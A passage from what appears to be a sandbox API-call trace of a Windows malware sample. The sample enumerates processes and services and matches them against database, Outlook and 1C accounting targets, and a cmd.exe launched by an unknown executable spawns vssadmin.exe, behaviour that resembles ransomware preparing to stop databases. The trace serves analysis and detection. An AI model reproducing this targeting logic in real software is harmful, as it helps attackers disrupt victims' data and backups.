lpString2="ShellHWDetection") returned -1 [0271.068] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0271.068] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0271.068] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0271.068] lstrlenW (lpString="Spooler") returned 7 [0271.068] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0271.068] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0271.068] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0271.068] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0271.068] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0271.068] lstrlenW (lpString="Themes") returned 6 [0271.068] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0271.069] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0271.069] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0271.069] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0271.069] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0271.069] lstrlenW (lpString="UxSms") returned 5 [0271.069] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0271.069] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0271.069] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0271.069] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0271.069] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0271.069] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3afc2d0 | out: hHeap=0x5e0000) returned 1 [0271.069] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1e8 [0271.070] Process32FirstW (in: hSnapshot=0x1e8, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0271.070] Process32NextW (in: hSnapshot=0x1e8, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x49, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0271.071] lstrlenW (lpString="System") returned 6 [0271.071] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0271.071] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0271.071] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0271.071] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0271.071] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0271.071] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0271.071] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0271.071] Process32NextW (in: hSnapshot=0x1e8, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0271.071] lstrlenW (lpString="smss.exe") returned 8 [0271.071] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0271.071] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0271.071] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0271.071] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0271.071] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0271.071] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0271.071] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0271.071] Process32NextW (in: hSnapshot=0x1e8, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0271.071] lstrlenW (lpString="csrss.exe") returned 9 [0271.072] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0271.072] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0271.072] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0271.072] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0271.072] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0271.072] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0271.072] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0271.072] Process32NextW (in: hSnapshot=0x1e8, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0271.072] lstrlenW (lpString="wininit.exe") returned 11 [0271.072] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0271.072] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0271.072] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0271.072] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0271.072] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0271.072] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0271.072] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0271.072] Process32NextW (in: hSnapshot=0x1e8, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0271.072] lstrlenW (lpString="csrss.exe") returned 9 [0271.072] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0271.073] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0271.073] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0271.073] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0271.073] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0271.073] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0271.073] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0271.073] Process32NextW (in: hSnapshot=0x1e8, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0271.073] lstrlenW (lpString="winlogon.exe") returned 12 [0271.073] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0271.073] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0271.073] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0271.073] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0271.073] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0271.073] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0271.073] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0271.073] Process32NextW (in: hSnapshot=0x1e8, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0271.073] lstrlenW (lpString="services.exe") returned 12 [0271.073] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0271.074] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0271.074] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0271.074] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0271.074] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0271.074] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0271.074] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0271.074] Process32NextW (in: hSnapshot=0x1e8, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0271.074] lstrlenW (lpString="lsass.exe") returned 9 [0271.074] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0271.074] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0271.074] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0271.074] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0271.074] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0271.074] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0271.074] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0271.074] Process32NextW (in: hSnapshot=0x1e8, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0271.074] lstrlenW (lpString="lsm.exe") returned 7 [0271.074] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0271.074] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0271.074] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0271.075] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0271.075] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0271.075] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0271.075] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0271.075] Process32NextW (in: hSnapshot=0x1e8, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.075] lstrlenW (lpString="svchost.exe") returned 11 [0271.075] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0271.075] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0271.075] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0271.075] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0271.075] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0271.075] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0271.075] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0271.075] Process32NextW (in: hSnapshot=0x1e8, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.075] lstrlenW (lpString="svchost.exe") returned 11 [0271.075] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0271.075] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0271.075] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0271.075] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0271.075] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0271.076] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0271.076] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0271.076] Process32NextW (in: hSnapshot=0x1e8, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.076] lstrlenW (lpString="svchost.exe") returned 11 [0271.076] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0271.076] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0271.076] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0271.076] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0271.076] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0271.076] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0271.076] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0271.076] Process32NextW (in: hSnapshot=0x1e8, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.076] lstrlenW (lpString="svchost.exe") returned 11 [0271.076] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0271.076] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0271.076] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0271.076] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0271.076] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0271.076] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0271.077] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0271.077] Process32NextW (in: hSnapshot=0x1e8, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.077] lstrlenW (lpString="svchost.exe") returned 11 [0271.077] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0271.077] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0271.077] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0271.077] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0271.077] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0271.077] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0271.077] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0271.077] Process32NextW (in: hSnapshot=0x1e8, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0271.077] lstrlenW (lpString="audiodg.exe") returned 11 [0271.077] lstrcmpiW (lpString1="1c8.exe", lpString2="audiodg.exe") returned -1 [0271.077] lstrcmpiW (lpString1="1cv77.exe", lpString2="audiodg.exe") returned -1 [0271.077] lstrcmpiW (lpString1="outlook.exe", lpString2="audiodg.exe") returned 1 [0271.077] lstrcmpiW (lpString1="postgres.exe", lpString2="audiodg.exe") returned 1 [0271.077] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="audiodg.exe") returned 1 [0271.077] lstrcmpiW (lpString1="mysqld.exe", lpString2="audiodg.exe") returned 1 [0271.077] lstrcmpiW (lpString1="sqlservr.exe", lpString2="audiodg.exe") returned 1 [0271.077] Process32NextW (in: hSnapshot=0x1e8, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.078] lstrlenW (lpString="svchost.exe") returned 11 [0271.078] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0271.078] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0271.078] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0271.078] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0271.078] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0271.078] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0271.078] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0271.078] Process32NextW (in: hSnapshot=0x1e8, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0271.078] lstrlenW (lpString="userinit.exe") returned 12 [0271.078] lstrcmpiW (lpString1="1c8.exe", lpString2="userinit.exe") returned -1 [0271.078] lstrcmpiW (lpString1="1cv77.exe", lpString2="userinit.exe") returned -1 [0271.078] lstrcmpiW (lpString1="outlook.exe", lpString2="userinit.exe") returned -1 [0271.078] lstrcmpiW (lpString1="postgres.exe", lpString2="userinit.exe") returned -1 [0271.078] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="userinit.exe") returned -1 [0271.078] lstrcmpiW (lpString1="mysqld.exe", lpString2="userinit.exe") returned -1 [0271.078] lstrcmpiW (lpString1="sqlservr.exe", lpString2="userinit.exe") returned -1 [0271.078] Process32NextW (in: hSnapshot=0x1e8, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0271.079] lstrlenW (lpString="explorer.exe") returned 12 [0271.079] lstrcmpiW (lpString1="1c8.exe", lpString2="explorer.exe") returned -1 [0271.079] lstrcmpiW (lpString1="1cv77.exe", lpString2="explorer.exe") returned -1 [0271.079] lstrcmpiW (lpString1="outlook.exe", lpString2="explorer.exe") returned 1 [0271.079] lstrcmpiW (lpString1="postgres.exe", lpString2="explorer.exe") returned 1 [0271.079] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="explorer.exe") returned 1 [0271.079] Process32NextW (in: hSnapshot=0x1e8, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x418, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0271.079] lstrlenW (lpString="dwm.exe") returned 7 [0271.079] Process32NextW (in: hSnapshot=0x1e8, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x450, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.079] lstrlenW (lpString="svchost.exe") returned 11 [0271.080] Process32NextW (in: hSnapshot=0x1e8, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x3a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="ivttvf.exe")) returned 1 [0271.080] lstrlenW (lpString="ivttvf.exe") returned 10 [0271.080] Process32NextW (in: hSnapshot=0x1e8, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x510, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0271.080] lstrlenW (lpString="spoolsv.exe") returned 11 [0271.080] Process32NextW (in: hSnapshot=0x1e8, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x4e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0271.080] lstrlenW (lpString="cmd.exe") returned 7 [0271.080] Process32NextW (in: hSnapshot=0x1e8, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.081] lstrlenW (lpString="svchost.exe") returned 11 [0271.081] Process32NextW (in: hSnapshot=0x1e8, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x584, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0271.081] lstrlenW (lpString="conhost.exe") returned 11 [0271.081] Process32NextW (in: hSnapshot=0x1e8, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0271.081] lstrlenW (lpString="taskhost.exe") returned 12 [0271.082] Process32NextW (in: hSnapshot=0x1e8, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0271.082] lstrlenW (lpString="reader_sl.exe") returned 13 [0271.082] Process32NextW (in: hSnapshot=0x1e8, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0271.082] lstrlenW (lpString="dllhost.exe") returned 11 [0271.082] Process32NextW (in: hSnapshot=0x1e8, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x654, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x540, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0271.083] lstrlenW (lpString="vssadmin.exe") returned 12 [0271.083] Process32NextW (in: hSnapshot=0x1e8, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x654, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x540, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 0 [0271.083] CloseHandle (hObject=0x1e8) returned 1 [0271.083] Sleep (dwMilliseconds=0x1f4) [0271.836] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x41ad300 [0272.016] EnumServicesStatusExW (in: hSCManager=0x41ad300, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x55ff44, lpServicesReturned=0x55ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x55ff44, lpServicesReturned=0x55ff5c, lpResumeHandle=0x0) returned 0 [0272.017] GetLastError () returned 0xea [0272.017] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa08) returned 0x427d1e0 [0272.017] EnumServicesStatusExW (in: hSCManager=0x41ad300, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x427d1e0, cbBufSize=0xa08, pcbBytesNeeded=0x55ff44, lpServicesReturned=0x55ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x427d1e0, pcbBytesNeeded=0x55ff44, lpServicesReturned=0x55ff5c, lpResumeHandle=0x0) returned 1 [0272.109] CloseServiceHandle (hSCObject=0x41ad300) returned 1 [0272.110] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0272.110] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0272.110] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0272.110] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0272.110] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0272.110] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0272.110] lstrlenW (lpString="AudioSrv") returned 8 [0272.110] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0272.110] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0272.110] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0272.110] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0272.111] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0272.111] lstrlenW (lpString="BFE") returned 3 [0272.111] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0272.111] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0272.111] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0272.111] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0272.111] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0272.111] lstrlenW (lpString="CscService") returned 10 [0272.111] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0272.111] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0272.111] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0272.111] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0272.111] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0272.111] lstrlenW (lpString="DcomLaunch") returned 10 [0272.111] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0272.111] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0272.111] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0272.111] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0272.111] lstrcmpiW (lpString1="sqlserveradhelper", 